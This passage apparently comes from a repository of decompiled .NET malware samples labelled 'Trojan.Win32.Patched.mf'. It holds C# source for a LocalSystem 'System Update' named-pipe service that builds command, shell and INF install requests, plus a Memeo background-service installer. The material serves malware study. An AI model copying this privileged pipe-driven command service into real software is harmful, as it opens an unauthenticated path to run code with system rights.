registryKey = Registry.CurrentConfig;
break;
}
return registryKey;
}
private static bool DirectoryExists(string dir) => new DirectoryInfo(dir).Exists;
private static void BuildCommandLine(string[] arguments)
{
int position;
for (position = 1; position < arguments.Length && !arguments[position].StartsWith("/arguments"); ++position)
PipeManager.commandLine = PipeManager.commandLine + arguments[position] + " ";
PipeManager.commandLine = PipeManager.commandLine.Remove(PipeManager.commandLine.Length - 1, 1);
PipeManager.BuildArguments(arguments, position);
}
private static void BuildArguments(string[] args, int position)
{
for (++position; position < args.Length && !args[position].StartsWith("/directory"); ++position)
PipeManager.argumentsValue = PipeManager.argumentsValue + args[position] + " ";
if (PipeManager.argumentsValue != "")
PipeManager.argumentsValue = PipeManager.argumentsValue.Remove(PipeManager.argumentsValue.Length - 1, 1);
PipeManager.BuildDirectoryPath(args, position);
}
private static void BuildDirectoryPath(string[] args, int position)
{
for (++position; position < args.Length && !args[position].StartsWith("/type"); ++position)
PipeManager.directoryPath = PipeManager.directoryPath + args[position] + " ";
PipeManager.installType = args[position + 1];
PipeManager.directoryPath = PipeManager.directoryPath.Remove(PipeManager.directoryPath.Length - 1, 1);
}
private void Start()
{
try
{
while (this._listen)
{
int[] numArray = new int[this.Pipes.Keys.Count];
this.Pipes.Keys.CopyTo((Array) numArray, 0);
foreach (int key in numArray)
{
ServerNamedPipe pipe = (ServerNamedPipe) this.Pipes[(object) key];
if (pipe != null && DateTime.Now.Subtract(pipe.LastAction).Milliseconds > 5000 && ((APipeConnection) pipe.PipeConnection).GetState() != 4)
{
pipe.Listen = false;
pipe.PipeThread.Abort();
this.RemoveServerChannel((object) ((APipeConnection) pipe.PipeConnection).NativeHandle);
}
}
if ((long) this.numChannels <= (long) this.NumberPipes)
{
ServerNamedPipe serverNamedPipe = new ServerNamedPipe(this.PipeName, this.OutBuffer, this.InBuffer, 5000, false);
try
{
serverNamedPipe.Connect();
serverNamedPipe.LastAction = DateTime.Now;
Interlocked.Increment(ref this.numChannels);
serverNamedPipe.Start();
this.Pipes.Add((object) ((APipeConnection) serverNamedPipe.PipeConnection).NativeHandle, (object) serverNamedPipe);
}
catch (InterProcessIOException ex)
{
this.RemoveServerChannel((object) ((APipeConnection) serverNamedPipe.PipeConnection).NativeHandle);
serverNamedPipe.Dispose();
ServiceLogger.Instance.Severe(((Exception) ex).StackTrace.ToString(), (Exception) ex);
}
}
else
{
this.Mre.Reset();
this.Mre.WaitOne(1000, false);
}
}
}
catch (Exception ex)
{
ServiceLogger.Instance.Warning(ex.Message.ToString(), ex);
}
}
public void Stop()
{
this._listen = false;
this.Mre.Set();
try
{
int[] numArray = new int[this.Pipes.Keys.Count];
this.Pipes.Keys.CopyTo((Array) numArray, 0);
foreach (int key in numArray)
((ServerNamedPipe) this.Pipes[(object) key]).Listen = false;
int num = this.numChannels * 3;
for (int index = 0; index < num; ++index)
this.StopServerPipe();
this.Pipes.Clear();
this.Mre.Close();
this.Mre = (ManualResetEvent) null;
}
catch (Exception ex)
{
ServiceLogger.Instance.Warning(ex.Message.ToString(), ex);
}
}
public void WakeUp()
{
if (this.Mre == null)
return;
this.Mre.Set();
}
private void StopServerPipe()
{
try
{
ClientPipeConnection clientPipeConnection = new ClientPipeConnection(this.PipeName);
if (!clientPipeConnection.TryConnect())
return;
((APipeConnection) clientPipeConnection).Close();
}
catch (Exception ex)
{
ServiceLogger.Instance.Warning(ex.Message.ToString(), ex);
}
}
public void RemoveServerChannel(object param)
{
int key = (int) param;
Interlocked.Decrement(ref this.numChannels);
this.Pipes.Remove((object) key);
this.WakeUp();
}
private enum InstallType
{
COMMAND,
SHELL,
INF,
}
}
}
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-57a055e0e8642f449b4d27fa8ff9cbc0f8367d8cdd69ab6deeca9a801697bce1/ServerNamedPipe.cs
+147
View File
@@ -0,0 +1,147 @@
// Decompiled with JetBrains decompiler
// Type: Tvsu.Service.Server.ServerNamedPipe
// Assembly: SUService, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: C794206D-ECC0-4CFA-AB4E-5C06FB2FD4CC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Patched.mf-57a055e0e8642f449b4d27fa8ff9cbc0f8367d8cdd69ab6deeca9a801697bce1.exe
using System;
using System.Threading;
using Tvsu.Service.Common.NamedPipes;
namespace Tvsu.Service.Server
{
public sealed class ServerNamedPipe : IDisposable
{
internal Thread PipeThread;
internal ServerPipeConnection PipeConnection;
internal bool Listen = true;
internal DateTime LastAction;
private bool disposed = false;
private void PipeListener()
{
this.CheckIfDisposed();
try
{
this.Listen = TvsuService.PipeManager.Listen;
Console.WriteLine("Pipe " + ((APipeConnection) this.PipeConnection).NativeHandle.ToString() + ": new pipe started" + Environment.NewLine);
while (this.Listen)
{
this.LastAction = DateTime.Now;
string str = ((APipeConnection) this.PipeConnection).Read();
this.LastAction = DateTime.Now;
int nativeHandle;
if (str.Trim() != "")
{
((APipeConnection) this.PipeConnection).Write(TvsuService.PipeManager.HandleRequest(str));
nativeHandle = ((APipeConnection) this.PipeConnection).NativeHandle;
Console.WriteLine("Pipe " + nativeHandle.ToString() + ": request handled" + Environment.NewLine);
}
else
((APipeConnection) this.PipeConnection).Write("Error: bad request");
this.LastAction = DateTime.Now;
this.PipeConnection.Disconnect();
if (this.Listen)
{
nativeHandle = ((APipeConnection) this.PipeConnection).NativeHandle;
Console.WriteLine("Pipe " + nativeHandle.ToString() + ": listening" + Environment.NewLine);
this.Connect();
}
TvsuService.PipeManager.WakeUp();
}
}
catch (ThreadAbortException ex)
{
Console.WriteLine(ex.StackTrace.ToString());
}
catch (ThreadStateException ex)
{
Console.WriteLine(ex.StackTrace.ToString());
}
catch (Exception ex)
{
Console.WriteLine(ex.StackTrace.ToString());
}
finally
{
this.Close();
}
}
internal void Connect()
{
this.CheckIfDisposed();
((APipeConnection) this.PipeConnection).Connect();
}
internal void Close()
{
this.CheckIfDisposed();
this.Listen = false;
TvsuService.PipeManager.RemoveServerChannel((object) ((APipeConnection) this.PipeConnection).NativeHandle);
this.Dispose();
}
internal void Start()
{
this.CheckIfDisposed();
this.PipeThread.Start();
}
private void CheckIfDisposed()
{
if (this.disposed)
throw new ObjectDisposedException(nameof (ServerNamedPipe));
}
public void Dispose()
{
this.Dispose(true);
GC.SuppressFinalize((object) this);
}
private void Dispose(bool disposing)
{
if (!this.disposed)
{
((APipeConnection) this.PipeConnection).Dispose();
if (this.PipeThread != null)
{
try
{
this.PipeThread.Abort();
}
catch (ThreadAbortException ex)
{
Console.WriteLine(ex.StackTrace.ToString());
}
catch (ThreadStateException ex)
{
Console.WriteLine(ex.StackTrace.ToString());
}
catch (Exception ex)
{
Console.WriteLine(ex.StackTrace.ToString());
}
}
}
this.disposed = true;
}
~ServerNamedPipe() => this.Dispose(false);
internal ServerNamedPipe(
string name,
uint outBuffer,
uint inBuffer,
int maxReadBytes,
bool secure)
{
this.PipeConnection = new ServerPipeConnection(name, outBuffer, inBuffer, maxReadBytes, secure);
this.PipeThread = new Thread(new ThreadStart(this.PipeListener));
this.PipeThread.IsBackground = true;
this.PipeThread.Name = "Pipe Thread " + ((APipeConnection) this.PipeConnection).NativeHandle.ToString();
this.LastAction = DateTime.Now;
}
}
}
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-57a055e0e8642f449b4d27fa8ff9cbc0f8367d8cdd69ab6deeca9a801697bce1/ServiceInstaller.cs
+67
View File
@@ -0,0 +1,67 @@
// Decompiled with JetBrains decompiler
// Type: Tvsu.Service.Server.ServiceInstaller
// Assembly: SUService, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: C794206D-ECC0-4CFA-AB4E-5C06FB2FD4CC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Patched.mf-57a055e0e8642f449b4d27fa8ff9cbc0f8367d8cdd69ab6deeca9a801697bce1.exe
using System;
using System.ComponentModel;
using System.Configuration.Install;
using System.Management;
using System.ServiceProcess;
using Tvsu.Service.Common.Util;
namespace Tvsu.Service.Server
{
[RunInstaller(true)]
public class ServiceInstaller : Installer
{
private System.ServiceProcess.ServiceInstaller serviceInstaller1;
private ServiceProcessInstaller serviceProcessInstaller1;
public ServiceInstaller() => this.InitializeComponent();
private void InitializeComponent()
{
this.serviceInstaller1 = new System.ServiceProcess.ServiceInstaller();
this.serviceProcessInstaller1 = new ServiceProcessInstaller();
this.Installers.Clear();
this.serviceInstaller1.DisplayName = "System Update";
this.serviceInstaller1.ServiceName = "SUService";
this.serviceInstaller1.StartType = ServiceStartMode.Automatic;
this.serviceInstaller1.BeforeUninstall += new InstallEventHandler(this.serviceInstaller1_BeforeUninstall);
this.serviceInstaller1.AfterInstall += new InstallEventHandler(this.serviceInstaller1_AfterInstall);
this.serviceProcessInstaller1.Account = ServiceAccount.LocalSystem;
this.serviceProcessInstaller1.Password = (string) null;
this.serviceProcessInstaller1.Username = (string) null;
this.Installers.AddRange(new Installer[2]
{
(Installer) this.serviceProcessInstaller1,
(Installer) this.serviceInstaller1
});
}
private void serviceInstaller1_AfterInstall(object sender, InstallEventArgs e)
{
TvsuService instance = TvsuService.Instance;
try
{
new ManagementScope("root\\CIMV2", new ConnectionOptions()
{
Impersonation = ImpersonationLevel.Impersonate
}).Connect();
ManagementObject managementObject = new ManagementObject("Win32_Service.Name='" + instance.ServiceName + "'");
ManagementBaseObject methodParameters = managementObject.GetMethodParameters("Change");
methodParameters["DesktopInteract"] = (object) true;
managementObject.InvokeMethod("Change", methodParameters, (InvokeMethodOptions) null);
}
catch (Exception ex)
{
ServiceLogger.Instance.Severe("Error using WMI to allow interact with the service", ex);
}
instance.TvsuServiceController.Start();
}
private void serviceInstaller1_BeforeUninstall(object sender, InstallEventArgs e) => TvsuService.Instance.TvsuServiceController.Stop();
}
}
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-57a055e0e8642f449b4d27fa8ff9cbc0f8367d8cdd69ab6deeca9a801697bce1/Trojan.Win32.Patched.mf.csproj
+46
View File
@@ -0,0 +1,46 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Patched.mf-57a055e0e8642f449b4d27fa8ff9cbc0f8367d8cdd69ab6deeca9a801697bce1.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{A425B86D-AA27-4A0C-BAB5-ACA950E26D63}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>SUService</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
<RootNamespace>Tvsu.Service.Server</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Configuration.Install" />
<Reference Include="System.Management" />
<Reference Include="System.ServiceProcess" />
</ItemGroup>
<ItemGroup>
<Compile Include="PipeManager.cs" />
<Compile Include="ServerNamedPipe.cs" />
<Compile Include="ServiceInstaller.cs" />
<Compile Include="TvsuService.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-57a055e0e8642f449b4d27fa8ff9cbc0f8367d8cdd69ab6deeca9a801697bce1/Trojan.Win32.Patched.mf.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SUService", "Trojan.Win32.Patched.mf-57a055e0e8642f449b4d27fa8ff9cbc0f8367d8cdd69ab6deeca9a801697bce1.csproj", "{A425B86D-AA27-4A0C-BAB5-ACA950E26D63}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{A425B86D-AA27-4A0C-BAB5-ACA950E26D63}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{A425B86D-AA27-4A0C-BAB5-ACA950E26D63}.Debug|Any CPU.Build.0 = Debug|Any CPU
{A425B86D-AA27-4A0C-BAB5-ACA950E26D63}.Release|Any CPU.ActiveCfg = Release|Any CPU
{A425B86D-AA27-4A0C-BAB5-ACA950E26D63}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-57a055e0e8642f449b4d27fa8ff9cbc0f8367d8cdd69ab6deeca9a801697bce1/TvsuService.cs
+74
View File
@@ -0,0 +1,74 @@
// Decompiled with JetBrains decompiler
// Type: Tvsu.Service.Server.TvsuService
// Assembly: SUService, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: C794206D-ECC0-4CFA-AB4E-5C06FB2FD4CC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Patched.mf-57a055e0e8642f449b4d27fa8ff9cbc0f8367d8cdd69ab6deeca9a801697bce1.exe
using System;
using System.ServiceProcess;
using Tvsu.Service.Common.InterProcessComm;
using Tvsu.Service.Common.Util;
namespace Tvsu.Service.Server
{
public class TvsuService : ServiceBase
{
private ServiceController serviceController1;
private static TvsuService instance = (TvsuService) null;
public static IChannelManager PipeManager;
private TvsuService() => this.InitializeComponent();
private static void Main() => ServiceBase.Run(new ServiceBase[1]
{
(ServiceBase) new TvsuService()
});
public static TvsuService Instance
{
get
{
if (TvsuService.instance == null)
TvsuService.instance = new TvsuService();
return TvsuService.instance;
}
}
public ServiceController TvsuServiceController => this.serviceController1;
private void InitializeComponent()
{
this.serviceController1 = new ServiceController("SUService", ".");
this.ServiceName = "SUService";
}
protected override void OnStart(string[] args)
{
try
{
TvsuService.PipeManager = (IChannelManager) new Tvsu.Service.Server.PipeManager();
TvsuService.PipeManager.Initialize();
ServiceLogger.Instance.Info("Start service");
}
catch (Exception ex)
{
ServiceLogger.Instance.Severe("Error on starting service", ex);
}
}
protected override void OnStop()
{
try
{
if (TvsuService.PipeManager == null)
return;
TvsuService.PipeManager.Stop();
ServiceLogger.Instance.Info("Stop service");
}
catch (Exception ex)
{
ServiceLogger.Instance.Severe("Error on stop service", ex);
}
}
}
}
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-7baf9cb6986a2764176ef57b9ea6985a0cc189acc05703abad9996ef80e59ac1/AssemblyInfo.cs
+14
View File
@@ -0,0 +1,14 @@
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: AssemblyProduct("MemeoBackgroundService")]
[assembly: AssemblyFileVersion("2.0.0.1")]
[assembly: Guid("51c8eb66-1230-443d-978b-0c37845e7d11")]
[assembly: ComVisible(false)]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCopyright("Copyright © Memeo 2008")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyCompany("Memeo")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyTitle("MemeoBackgroundService")]
[assembly: AssemblyVersion("2.0.0.1")]
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-7baf9cb6986a2764176ef57b9ea6985a0cc189acc05703abad9996ef80e59ac1/MemeoBackgroundService/ProjectInstaller.cs
+69
View File
@@ -0,0 +1,69 @@
// Decompiled with JetBrains decompiler
// Type: MemeoBackgroundService.ProjectInstaller
// Assembly: MemeoBackgroundService, Version=2.0.0.1, Culture=neutral, PublicKeyToken=null
// MVID: CEE04D16-EE80-4DF1-BC73-2B3D265B7030
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-7baf9cb6986a2764176ef57b9ea6985a0cc189acc05703abad9996ef80e59ac1.exe
using System;
using System.Collections;
using System.ComponentModel;
using System.Configuration.Install;
using System.ServiceProcess;
namespace MemeoBackgroundService
{
[RunInstaller(true)]
public class ProjectInstaller : Installer
{
private IContainer components = (IContainer) null;
private ServiceProcessInstaller serviceProcessInstaller;
private ServiceInstaller serviceInstaller;
protected override void Dispose(bool disposing)
{
if (disposing && this.components != null)
this.components.Dispose();
base.Dispose(disposing);
}
private void InitializeComponent()
{
this.serviceProcessInstaller = new ServiceProcessInstaller();
this.serviceInstaller = new ServiceInstaller();
this.serviceProcessInstaller.Account = ServiceAccount.LocalSystem;
this.serviceProcessInstaller.Password = (string) null;
this.serviceProcessInstaller.Username = (string) null;
this.serviceInstaller.DisplayName = "Memeo Background Service";
this.serviceInstaller.ServiceName = "MemeoBackgroundService";
this.serviceInstaller.StartType = ServiceStartMode.Automatic;
this.Installers.AddRange(new Installer[2]
{
(Installer) this.serviceProcessInstaller,
(Installer) this.serviceInstaller
});
}
public ProjectInstaller() => this.InitializeComponent();
protected override void OnCommitted(IDictionary savedState)
{
base.OnCommitted(savedState);
try
{
new ServiceController("MemeoBackgroundService").Start();
}
catch (Exception ex)
{
throw new InstallException("Failed to start the service!");
}
}
public override void Uninstall(IDictionary savedState) => base.Uninstall(savedState);
protected override void OnCommitting(IDictionary savedState) => base.OnCommitting(savedState);
protected override void OnBeforeInstall(IDictionary savedState) => base.OnBeforeInstall(savedState);
public override void Install(IDictionary stateSaver) => base.Install(stateSaver);
}
}
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-7baf9cb6986a2764176ef57b9ea6985a0cc189acc05703abad9996ef80e59ac1/MemeoBackgroundService/ProjectInstaller.resx
+120
View File
@@ -0,0 +1,120 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-7baf9cb6986a2764176ef57b9ea6985a0cc189acc05703abad9996ef80e59ac1/RemoteServerService/MemeoBackgroundService.cs
+64
View File
@@ -0,0 +1,64 @@
// Decompiled with JetBrains decompiler
// Type: RemoteServerService.MemeoBackgroundService
// Assembly: MemeoBackgroundService, Version=2.0.0.1, Culture=neutral, PublicKeyToken=null
// MVID: CEE04D16-EE80-4DF1-BC73-2B3D265B7030
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-7baf9cb6986a2764176ef57b9ea6985a0cc189acc05703abad9996ef80e59ac1.exe
using MemeoRemoteCore.Logging;
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Runtime.Remoting;
using System.ServiceProcess;
namespace RemoteServerService
{
internal class MemeoBackgroundService : ServiceBase
{
private Container components = (Container) null;
public MemeoBackgroundService() => this.InitializeComponent();
private static void Main() => ServiceBase.Run(new ServiceBase[1]
{
(ServiceBase) new MemeoBackgroundService()
});
private void InitializeComponent()
{
this.CanHandlePowerEvent = true;
this.ServiceName = nameof (MemeoBackgroundService);
}
protected override void Dispose(bool disposing)
{
if (disposing && this.components != null)
this.components.Dispose();
base.Dispose(disposing);
}
protected override void OnStart(string[] args)
{
try
{
Logger.InitializeLogger();
Logger.LogInfo("**********************Logger initialized(new instance of the Service)*******************");
Logger.LogInfo("Configuring Remote Server...");
RemotingConfiguration.Configure(Path.GetDirectoryName(Assembly.GetExecutingAssembly().Location) + "\\MemeoBackgroundService.exe.config", false);
Logger.LogInfo("Done configuring.");
this.EventLog.WriteEntry("Memeo Background Service Started!", EventLogEntryType.Information);
}
catch (Exception ex)
{
Logger.LogError("Service Start failure: " + ex.Message + " " + ex.StackTrace);
this.EventLog.WriteEntry("Problem starting Memeo Background Service :" + ex.Message + ex.StackTrace, EventLogEntryType.Error);
}
}
protected override void OnStop() => this.EventLog.WriteEntry("Memeo Background Service Stopped!", EventLogEntryType.Information);
protected override bool OnPowerEvent(PowerBroadcastStatus powerStatus) => base.OnPowerEvent(powerStatus);
}
}
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-7baf9cb6986a2764176ef57b9ea6985a0cc189acc05703abad9996ef80e59ac1/RemoteServerService/MemeoBackgroundService.resx
+120
View File
@@ -0,0 +1,120 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-7baf9cb6986a2764176ef57b9ea6985a0cc189acc05703abad9996ef80e59ac1/Trojan.Win32.Patched.mf.csproj
+46
View File
@@ -0,0 +1,46 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
